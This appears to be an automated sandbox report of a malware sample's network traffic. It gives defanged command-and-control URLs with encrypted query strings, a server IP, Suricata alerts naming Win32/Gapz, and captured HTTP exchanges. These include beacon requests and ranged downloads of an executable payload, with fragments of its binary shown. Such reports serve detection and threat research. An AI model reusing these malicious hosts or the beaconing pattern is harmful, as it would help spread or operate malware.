hxxp://mx0t7t8a-hvjtfa3f.netdna-ssl.com/21873.ashx?e=j7YMo/n29XMqqDJt46TNceL7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqfhTy6irisLyMLwVoAmU3rnUzRVzAnl uE2u9JLQWwrLy4nObRfTEBuW6N7VzRzZRPvR04A9l6BnRZMqJOE B8wLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw==	198.232.124.192
hxxp://mx0t7t8a-hvjtfa3f.netdna-ssl.com/6765.ashx?e=4mC0vXGWFtoLjT49fHfOTLvsi0J15i T/Dn8i7qp5mBrRPNUypxOtyiJpOuGuO 6ghmiZJc6KBe9Kbi6m4oCRgBrvvpkJ9n7A70bqKJZm1WSCxag5O5u4W iVxYuINcnTc/ TiC/QQMa8vvz4viJlg2RP94xFG3Lj0N7bp/0QtRAkqBmtM5btymF904v4t2DqIs V7Ds6CRuZZIi5/tojjeFKyzEEA2TzBaKXaEKdzFwqwK4Z/LB/gEuwwpt2SWXjaQSUVKXu21L8ExzavHCoY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VHfYSVZEw0FoeH5rA5Iu0bwRW9YYJxQho=	198.232.124.192
hxxp://mx0t7t8a-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoZmQz1jSMZVP0JQd5HxgIXdqfANv YB6XIJQffTeIm3ijZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUd9hJVkTDQWh4fmsDki7RvBFb1hgnFCGg==	198.232.124.192
hxxp://pwvz71qp-ur1xo6pn.netdna-ssl.com/wu.ashx?dsid=1&s=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70,&v=2.1.9.476&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc	198.232.124.192
hxxp://mx0t7t8a-hvjtfa3f.netdna-ssl.com/6765.ashx?e=j7YMo/n29XMVCZIctrluXtaZD9ii2/f24oNkMudt8cymy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3QoyTnjIGwsDHqw5vZq5l38VizWrzz2Aai1pxIHn7ibkOWufSVBCsQTuVqOEbeDQPM9QwHA7xSPxo UCJoj6Xc7yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHidRTXymTQoAnR8SJA d bWCF/Jve3H wkbF gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBcgN Ty9FJY0O7fFnRtDe1osnNJHL5mEh8=	198.232.124.192
hxxp://mx0t7t8a-hvjtfa3f.netdna-ssl.com/6765.ashx?e=c0XmKevqA0lSGyd5XovakSbVQUa08Zx3/lCDRYG1zoogLxC0aXqYrSdIMT2RiZMDI9Pw QuaY uDexQCHyhw9OLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8KIVyy9nVE95oyD6CU7dt4Wn8ksZ3j7x1gsDoUhkcyDa4XSJ2T /Zj2VSvOHNjNGn6gNHgF/q1DvbBptC4f3pHrdTkDoD53M3v4ojYShxKAxAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU	198.232.124.192

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /6765.ashx?e=4mC0vXGWFtoLjT49fHfOTLvsi0J15i T/Dn8i7qp5mBrRPNUypxOtyiJpOuGuO 6ghmiZJc6KBe9Kbi6m4oCRgBrvvpkJ9n7A70bqKJZm1WSCxag5O5u4W iVxYuINcnTc/ TiC/QQMa8vvz4viJlg2RP94xFG3Lj0N7bp/0QtSOm5eZ4cw1FBPrMwLm 2sRKYX3Ti/i3YOf7z1fPDIyyjg2OmgWJ4lq67cZcKsLWgH9yNWaFTuYKrYcDgYC7zhTHdtdgGHkZrI4k4Gm5vvSstZQIIdBr0SRQrH24oKCbQXdvg6erlcKEy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjl5XcFPmn7eLza1j1N3xCkMTBbXHTkGo58= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:32 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=AZwPyJy3TZihee7pGMSR6daZD9ii2/f2WRJHy18FaUemy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3QoyTnjIGwsDHqw5vZq5l38VizWrzz2Aai1pxIHn7ibkOWufSVBCsQTuVqOEbeDQPM9QwHA7xSPxrXIxNf6X/p9imua2CCuc c Scs327XoBKYX3Ti/i3YPU0Du1cPcKYLvc15CnxI 1Bzyh/sQEsZTMbLpFEamS6guUQ2TojCHtS5gMMSKZvbRw 78jvdhFSmEw6RIFoGV1lex/kVKG etYInQili7HfPDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVj2Hy0rzzcLx92It5KdqWLEnMJbthPftrfVZ5SP4heF/I= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:32 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 20 Jun 2015 16:42:32 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /21873.ashx?e=PcwT4QFtuPBwlKCj/kNh8 L7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1V1dA7x4KTM2T0tY TAasH KYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMdF2wYySv2jl HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:21 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /21873.ashx?e=j7YMo/n29XMqqDJt46TNceL7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqfhTy6irisLyMLwVoAmU3rnUzRVzAnl uE2u9JLQWwrLy4nObRfTEBuW6N7VzRzZRPvR04A9l6BnRZMqJOE B8wLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /21873.ashx?e=j7YMo/n29XMqqDJt46TNceL7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWt6/KwEvQjAfCESiW wqgeJJNlRzoCiiPdLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /21873.ashx?e=j7YMo/n29XMqqDJt46TNceL7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqcnIzPjk7XGtW1B5cJyD8WHLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 20 Jun 2015 16:42:22 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /21873.ashx?e=M7A8vgjJHrgnU0zGYqnF7daZD9ii2/f2E13rHoa9hTimy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3QoyTnjIGwsDHqw5vZq5l38VizWrzz2Aai1pxIHn7ibkOWufSVBCsQTuVqOEbeDQPHv58s/52O3CsivMaAupUnRd4VqhSAhk2COVVvHCTb5Jjgb6v7cXpPu546ss fhCekeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWPYfLSvPNwvH3Yi3kp2pYsScwlu2E9 2t9VnlI/iF4X8g== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 20 Jun 2015 16:42:22 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /t.ashx?e=XOxRKBm2zlxAvMuihpEQc5nRI kIbY7XAZx7JfD/ZiMeaFNcfNJ0DpzaErgvbAYV621wjv8RxAE2k3rChAhMDjlEPoRShnW8YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: gk36g6j-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=XOxRKBm2zlxAvMuihpEQc5nRI kIbY7XAZx7JfD/ZiMeaFNcfNJ0DpzaErgvbAYV621wjv8RxAE2k3rChAhMDjlEPoRShnW8YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: gk36g6j-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=XOxRKBm2zlxAvMuihpEQc5nRI kIbY7XAZx7JfD/ZiMeaFNcfNJ0DpzaErgvbAYV621wjv8RxAE2k3rChAhMDjlEPoRShnW8YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: gk36g6j-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhskHTTP/1.1 200 OK..Date: Sat, 20 Jun 2015 16:42:22 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /smw9476dp.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Range: bytes 0-249999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: zi-VJ_GeR97qila0ODNClQX4triBy1FbhiJtF_DmVgycLQ8mbfQBLg==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
..........=......................................s..........XB........
....<.(............................................................
p...............................text....[.......\.................. ..
`.rdata.......p.......`..............@[email protected].......
[email protected]...`[email protected].
..v..............@..@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected]@..e...E..E.P.u...
.r@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@
..u....E..9}[email protected].}.j.W.E......E.......@[email protected]
[email protected]<[email protected] [email protected]...\r
@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......
t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Range: bytes 750000-999999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: r9STyEppeDHY-kaCcaWB76SRchPMZS5rgV15N44nJlRM0OSYeHovPg==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:22 GMT..Content-Range: bytes 7500
00-999999/3973864..X-Cache: Hit from cloudfront..Via: 1.1 795b65ff0c55
e70d8791f9def508f3a8.cloudfront.net (CloudFront)..X-Amz-Cf-Id: r9STyEp
peDHY-kaCcaWB76SRchPMZS5rgV15N44nJlRM0OSYeHovPg==..j.%...Q.....t...U.y
x6_U..\C0.i=.W8.....x.e|.....u..P......._...7..m..g.....m.#...E..JD...
...{[email protected]{......,K2knQ.Z1..q3{.IVL..PB).3.................me........"
.q...v..jqm.....,e....Z-.:...}a.v.........BV[3....6v.....U.<a5q....
.:......A..!...{.k......W..U..L%..Z..cGUgs7..t... H......I..I......FN.
.&L..#...B..hWg9,....r.i*E.r.u.._...^.._...B3..../....R......X..i.B...
<.0...DT]...}......iA..]**{..U...C)|?B....$....GK..|...Cr"...IV'..^
........W.5./...'.m`..'..LI#.Us.0n.s:Hw..Ed?3...V.O.zIC..1...XT.i...\f
A.&...XC.!..S_%2=..i0K....f...6...;..`..].`....$Z.^.....r!.Y.. $....Yj
g......r"G....V.hk&....Z..).&b.$.[ <&..z`n.V............t.....(.c.W
...`9..7&...]..=.X..461......}*...][..a.7.a.L.......S.N...M-..........
Y4.......I.$C..O]..f....#.....p.....f0.8...p.Y=OP.$..nC'.:.B.....>.
.P..p5...D....~.2....@:..C...=..yc...s,....d..\..6.......L...}.>/..
.I...ab.......M........\d.G.7\.[.....k..[u.>..?t.......z..a.s.2..:Y
s/}..Y....P,...//..OP...g......n(w2..*Y.....)...<......jL]p%q .
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:26 GMT

Content-Range: bytes 2000000-2249999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: K811i2M9OYCxqDYMx1I-C5qDeddU2C4xgssbxkqjnOZKl-CeV7e5mQ==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:26 GMT..Content-Range: bytes 2000
000-2249999/3973864..X-Cache: Miss from cloudfront..Via: 1.1 795b65ff0
c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)..X-Amz-Cf-Id: K811
i2M9OYCxqDYMx1I-C5qDeddU2C4xgssbxkqjnOZKl-CeV7e5mQ==..E{...........D..
2. A.z.Y.a.>.8..U"*..>.v.[.].K..(....K...O....0.*`.`8.Y.P...u5..
c.K..1jJ.y.p[..p.9O1.y..EV..d.ds.....O..6..0.......@m.*.@ [email protected]..
.t..hD..A.~...%[email protected]*..n..,....HG)....6...{..S..ys...#C
4...&3.<...Q. ..qk7.....A...I.#..Z...1.4r..e".&.E...l.a]&.ld.kMt]`.
..n..\....s._.;.......MfI.....1....S......^j...s.P.......#.......W....
.{.....'...*......8.QZ...w.q....a8.5..d...;....?..#...-...P....5......
^j...y..I.z......W...i.[y..........F.[NO*.1..J.3...n..h.]....[........
7..e`..3.}...(...;.......o..@,...6n...e Us..@[...#..Yw.e..9...$....~HN
.......lZi...H.~d..O...k.....jk.}.@#...e.4.M}...V......u...s..N2.H[6.?
.^......gB.;.... r.C..m.I.&...P...E.$...`t..j*..t_....L......l...1....
>.|....d...dL.^.....Re&~.^.k..Y...xz..A/...].(.o....N.j..&d.<...
. .7..D...rA....Y....p.|.....U.......o..z.....#.xN...e.yr.Xto.d(.9..n.
....6%m..[)b.......L.Lc8F..~..J.......u...=........u..*[email protected].?....h..
.K..Wh[.Q6Axt.;......}......2..pv..sf.>..[EW.i\.S|B.....k~..o..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:28 GMT

Content-Range: bytes 2750000-2999999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Uf_QIvgJcZtIs2jsXBENbSPkvGUBQSXUBm6u22WZOA56RzAPvNu5XA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:28 GMT..Content-Range: bytes 2750
000-2999999/3973864..X-Cache: Miss from cloudfront..Via: 1.1 795b65ff0
c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)..X-Amz-Cf-Id: Uf_Q
IvgJcZtIs2jsXBENbSPkvGUBQSXUBm6u22WZOA56RzAPvNu5XA==........$L3..@...@
 *.*.|......E=v.wVz...}.....E...c..,..Z..........<...-y...7.B...E.`
.....L... ..m....O...Y.).P.w.....F..WB.5#..}6a?...C.f....4..mm.....m.S
.../.Nr/........-.".....b..n:..fL........l.f5m.....(I......x.....oT.wv
.C.......{....O..O....Gp.\..../.$...9xy...o..._...5.A.X...ev4.#d...h.F
..mi....T......V.......T..9h.Tw............!./vh.i......AU.!PBW.e.....
.. ...U.AST,..5..^.SK.O....,..tH..&9r....> ../.wa%Z.$.q.y.5?n....T?
........."..}.c.9c?Q..*=.-.KQSS .K..h...}.".6..!....}.G....!V....q.m$b
.........*.A...eiW...g%.h.#. .3z.)...m..b.`..#..h.\.x. #.K...=.l..I...
.t.K......2.k%......A.S.(:...[[email protected]..[.RB....... ...
-X........2.T8./.a.k...S.....0...."S`..R...Y{......#.` ...9..qv.,_....
.....:..P.c....m.W..#.J.b..:g.......A.$..Q.G...:..f.U...[....."D......
.v..A..u..]...AT..w)[email protected].).j...Q b.K..7~...6......kc.
.._...|.L1...l...z. .[.(......|..gO..XeEMb.Ma.".."."&......h...9..y...
..[?...u.....EN..M76.......k..<.5b......f8...L...D ..|..K.i....
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:28 GMT

Content-Range: bytes 3000000-3249999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DNzyyRq37VodW-IOdrp7ybcLzv1aC-8nQ-Ugq8pWrSToa-Bt0j53GA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:28 GMT..Content-Range: bytes 3000
000-3249999/3973864..X-Cache: Miss from cloudfront..Via: 1.1 795b65ff0
c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)..X-Amz-Cf-Id: DNzy
yRq37VodW-IOdrp7ybcLzv1aC-8nQ-Ugq8pWrSToa-Bt0j53GA==........BUPE.-4...
N.(.....i.n.t.......hU"...@".*d..:...<(d-...4G2-..:..%y..cyIA...J..
.<.....TU.#.T.,c..\5....D..M":...Pk.H.... ..ol6$.7....k.3B.f (!.a7.
....f..6C\.2eU....w.N.........1C..nQ.9F.]g/....&....$...ra .Acr0.>,
.... XB.q...!,....F2..^y....R`.n1n....Q..!Q..f9tnZ..E........../7@....
...#,F......M._.W.n;l.....[......'...N....j..}Hk.|...z.G"akK......6..J
........x..Kj...\...Q.j.a...4.i>^..........fZ........C|.,eA......._
.m....>V,..|8.......T....~.............y.7\-.]<Yx ..#..b..(....m
[email protected].:........n.6...........o?Mu...-...h.Plh.....Q.....%..L.
9....|.6^.;.].8.i..vn.h<,.{........1....X.H.8....m.w..5c...ur..!...
..B......J.......8j.z'.D.".....:.b0.S...(*.3N..".p..t.....3c..!...<
..Y.U............7G.(.......uyl..:..O{.-..~.[=.f.V....Z.?.I..2...m.C4.
..H...g.8........ ..\..A..f...m..W....?..,L.....!..r.!m.!.D.T......i](
.C....a,.v{........^......s..n..".3....|..r.?n...........E.a.6.Xq..F5.
(%D....9...'.....A.].8..b]...j....zt....e*...w.J..*8<-.|....0..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:29 GMT

Content-Range: bytes 3250000-3499999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: lGVn68t-B2XOfmjjOzjKQ4LRoN-oD5SXpwKjq7HuGduScBdWVhy61g==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:29 GMT..Content-Range: bytes 3250
000-3499999/3973864..X-Cache: Miss from cloudfront..Via: 1.1 795b65ff0
c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)..X-Amz-Cf-Id: lGVn
68t-B2XOfmjjOzjKQ4LRoN-oD5SXpwKjq7HuGduScBdWVhy61g==..g.u..u..f...{.l%
